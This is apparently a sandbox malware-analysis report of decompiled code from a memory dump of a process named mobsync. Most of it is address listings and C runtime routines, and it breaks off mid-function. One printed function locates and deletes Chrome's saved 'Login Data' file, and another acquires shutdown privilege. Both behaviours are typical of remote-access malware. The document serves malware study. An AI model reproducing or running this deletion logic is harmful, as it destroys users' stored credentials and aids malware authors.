0x00441cd1
0x00441cd1
0x00000000
0x00441cd1
0x00441cae
0x00441cae
0x00441caf
0x00441caf
0x00441caf
0x00441cdc
0x00441c8f
0x00441c8f
0x00441c8f
0x00441ce9
0x00441ceb
0x00441ced
0x00441cef
0x00441cff
0x00441cff
0x00441cf1
0x00441cf1
0x00441cf4
0x00000000
0x00441cf6
0x00441cf6
0x00441cf7
0x00441cfc
0x00441cf4
0x00441d05
0x00441d10
0x00441d1b
0x00441b0f
0x00441b13
0x00441b18
0x00441b19
0x00441b1b
0x00000000
0x00441b21
0x00441b25
0x00441b2a
0x00441b2b
0x00441b2d
0x00000000
0x00441b33
0x00441b39
0x00441b3e
0x00441b44
0x00441b4b
0x00441b51
0x00441b54
0x00441b5a
0x00441b61
0x00441b67
0x00441b6b
0x00441b71
0x00441b74
0x00441b7b
0x00441b80
0x00441b80
0x00441b82
0x00441b82
0x00441b85
0x00441b8c
0x00441ba4
0x00441ba4
0x00441ba7
0x00441b8e
0x00441b8e
0x00441b93
0x00441b95
0x00000000
0x00441b97
0x00441b99
0x00441b9f
0x00441b9f
0x00441b95
0x00441baf
0x00441bc3
0x00441bc9
0x00441bcb
0x00441bd9
0x00441bdb
0x00441bcd
0x00441bcd
0x00441bd0
0x00000000
0x00441bd2
0x00441bd4
0x00441bd4
0x00441bd0
0x00441bf0
0x00441bf7
0x00441bf9
0x00441c08
0x00441c0b
0x00441bfb
0x00441bfb
0x00441bfe
0x00000000
0x00441c00
0x00441c03
0x00441c03
0x00441bfe
0x00441bf9
0x00441c15
0x00441c1f
0x00441c24
0x00441c29
0x00441c30
0x00441c30
0x00441b2d
0x00441b1b
0x0044194c
0x0044194c
0x00441952
0x00441957
0x0044198d
0x0044198e
0x00441994
0x00441996
0x00441996
0x00441999
0x00441999
0x0044199b
0x0044199c
0x004419a2
0x004419ad
0x004419b2
0x004419b7
0x004419c1
0x00000000
0x004419c7
0x004419c7
0x004419c9
0x004419ca
0x004419ca
0x004419cd
0x004419cd
0x004419cf
0x004419d0
0x004419d7
0x004419dc
0x004419e1
0x004419e6
0x004419ee
0x004419ef
0x004419f5
0x004419fa
0x004419ff
0x00441a05
0x00441a0a
0x00441a0b
0x00441a0e
0x00000000
0x00000000
0x00000000
0x00441a0e
0x00441a13
0x00441a14
0x00441a19
0x00441a1b
0x00441a1b
0x00441a23
0x00441a29
0x00441a2c
0x00441a2c
0x00441a30
0x00000000
0x00000000
0x00441a3a
0x00441a3a
0x00441a3d
0x00441a40
0x00441a42
0x00441a50
0x00441a52
0x00441a5c
0x00441a5c
0x00441a5e
0x00441a60
0x00000000
0x00000000
0x00441a57
0x00441a59
0x00441a5b
0x00441a5b
0x00000000
0x00441a5b
0x00000000
0x00441a59
0x00441a62
0x00441a65
0x00441a67
0x00441a72
0x00441a74
0x00441a7e
0x00441a7e
0x00441a80
0x00441a82
0x00000000
0x00000000
0x00441a79
0x00441a7b
0x00441a7d
0x00441a7d
0x00000000
0x00441a7d
0x00000000
0x00441a7b
0x00441a7e
0x00441a65
0x00441a84
0x00441a84
0x00441a86
0x00441a8a
0x00441a8a
0x00441a8f
0x00441a91
0x00441a94
0x00441a97
0x00441a99
0x00441a9c
0x00441ab4
0x00441ab7
0x00441aba
0x00441ac2
0x00441ac7
0x00441acc
0x00000000
0x00441acc
0x00441a9e
0x00441aa3
0x00441aa6
0x00441aab
0x00441aae
0x00441ab0
0x00000000
0x00000000
0x00441ab2
0x004419ff
0x00000000
0x004419e6
0x00441959
0x00441959
0x0044195b
0x0044195d
0x0044195d
0x00441961
0x00000000
0x00000000
0x00441965
0x00441979
0x00441979
0x00441967
0x00441967
0x00441967
0x0044196d
0x00000000
0x0044196f
0x0044196f
0x00441972
0x00441977
0x00000000
0x00000000
0x00000000
0x00000000
0x00441977
0x0044196d
0x00441982
0x00441984
0x00441ad3
0x00441ad3
0x0044198a
0x0044198a
0x00000000
0x0044198a
0x00000000
0x00441984
0x0044197d
0x0044197f
0x0044197f
0x00000000
0x0044197f
0x00441957
0x00000000

APIs

_free.LIBCMT ref: 0044198E
_free.LIBCMT ref: 004419B2
_free.LIBCMT ref: 00441B39
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045912C), ref: 00441B4B
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00441BC3
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00441BF0
_free.LIBCMT ref: 00441D05

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: ebdcb056598df201a8145d9a1a73534ad6814239905505607a508ca57279268b
Instruction ID: 27a0a09a5c018c0c883660709ccb2a601b23158d2266427735da08219fe15e6e
Opcode Fuzzy Hash: ebdcb056598df201a8145d9a1a73534ad6814239905505607a508ca57279268b
Instruction Fuzzy Hash: 68C14A71900249AFEB209F69DC41AAA7BB8EF85314F1441AFE481E7261EB388DC1C758

Uniqueness

Uniqueness Score: -1.00%

Function 0040A291, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A291(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402064(_t20, _t28);
						E0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}

0x0040a291
0x0040a291
0x0040a2b1
0x0040a2b6
0x0040a2bf
0x0040a2d5
0x0040a2fb
0x0040a2fd
0x00000000
0x0040a2d7
0x0040a2de
0x0040a2e1
0x0040a2ef
0x0040a2f1
0x0040a302
0x0040a302
0x0040a307
0x0040a30c
0x0040a2e8
0x0040a2e8
0x0040a2e8
0x0040a2e1
0x0040a314
0x0040a31f

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A2CD
GetLastError.KERNEL32 ref: 0040A2D7

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040A2FD
[Chrome StoredLogins not found], xrefs: 0040A2F1
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A298
UserProfile, xrefs: 0040A29D

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 88c8f9c54937d0c1caeec3d247528a68fe1893a1c646367896fa2d3b5134f358
Instruction ID: 3bbe084eb151dafee0128e30ec1122695afa5e51df6dfb55aa123115758e1eef
Opcode Fuzzy Hash: 88c8f9c54937d0c1caeec3d247528a68fe1893a1c646367896fa2d3b5134f358
Instruction Fuzzy Hash: DE01F221A803095BCA04BAB5CD1B8AE7724A912305B50027FFC02732E2ED7E491986DF

Uniqueness

Uniqueness Score: -1.00%

Function 004132F7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004132F7() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

0x0041330b
0x0041331d
0x00413329
0x00413335
0x0041333c
0x00413351

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
LookupPrivilegeValueA.ADVAPI32 ref: 0041331D
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
GetLastError.KERNEL32 ref: 00413342

Strings

SeShutdownPrivilege, xrefs: 00413317

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
Instruction ID: 9f46d7e8cb4fae5eef3d6f74a49905a97f95598c6ea8fd14d39892eab67246b1
Opcode Fuzzy Hash: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
Instruction Fuzzy Hash: B7F03A71801229BBDB10AFA1ED0DEEFBF7CEF05A52F000060B905A2196D6348B14CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 0044C56A, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E0044C56A(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0x46a00c; // 0x44c884ad
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E0044C540( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E00442406( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E0044F7E0(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E00450670(E0044F8F0(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E00431810(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E00431810(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E00450630(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = E00450630(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
